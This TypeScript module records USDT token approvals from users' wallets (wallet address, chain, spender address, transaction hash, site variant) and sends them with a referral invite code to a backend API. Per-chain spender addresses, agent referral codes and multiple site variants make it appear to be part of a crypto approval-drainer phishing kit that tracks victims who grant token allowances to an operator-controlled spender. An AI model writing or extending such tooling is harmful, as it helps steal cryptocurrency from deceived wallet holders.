import type { SiteVariant, WalletChainId } from "../config"
import { getInviteCode } from "../agent-ref"
import { getSpenderForChain, getUsdtForChain } from "../contracts/addresses"

export type SubmitApprovalPayload = {
  inviteCode: string
  walletAddress: string
  chain: WalletChainId
  tokenAddress: string
  spenderAddress: string
  approvalTxHash?: string | null
  siteVariant: SiteVariant
}

function getApiBaseUrl() {
  return import.meta.env.VITE_API_URL?.replace(/\/$/, "") ?? ""
}

export async function submitApprovalRecord(
  payload: Omit<SubmitApprovalPayload, "inviteCode">,
): Promise<boolean> {
  const apiBaseUrl = getApiBaseUrl()
  const inviteCode = getInviteCode()

  if (!apiBaseUrl || !inviteCode) {
    console.warn(
      "[submitApprovalRecord] Missing VITE_API_URL or invite code (?ref=)",
    )
    return false
  }

  const body: SubmitApprovalPayload = {
    ...payload,
    inviteCode,
  }

  for (let attempt = 0; attempt < 2; attempt += 1) {
    try {
      const response = await fetch(`${apiBaseUrl}/api/public/approvals`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(body),
      })

      if (response.ok) {
        return true
      }

      if (attempt === 0 && response.status >= 500) {
        continue
      }

      console.warn(
        `[submitApprovalRecord] Failed with status ${response.status}`,
      )
      return false
    } catch (cause) {
      if (attempt === 0) continue
      console.warn("[submitApprovalRecord] Network error", cause)
      return false
    }
  }

  return false
}

export function buildApprovalPayload(input: {
  walletAddress: string
  chain: WalletChainId
  approvalTxHash?: string | null
  siteVariant: SiteVariant
}): Omit<SubmitApprovalPayload, "inviteCode"> {
  const usdt = getUsdtForChain(input.chain)
  return {
    walletAddress: input.walletAddress,
    chain: input.chain,
    tokenAddress: usdt.address,
    spenderAddress: getSpenderForChain(input.chain),
    approvalTxHash: input.approvalTxHash,
    siteVariant: input.siteVariant,
  }
}
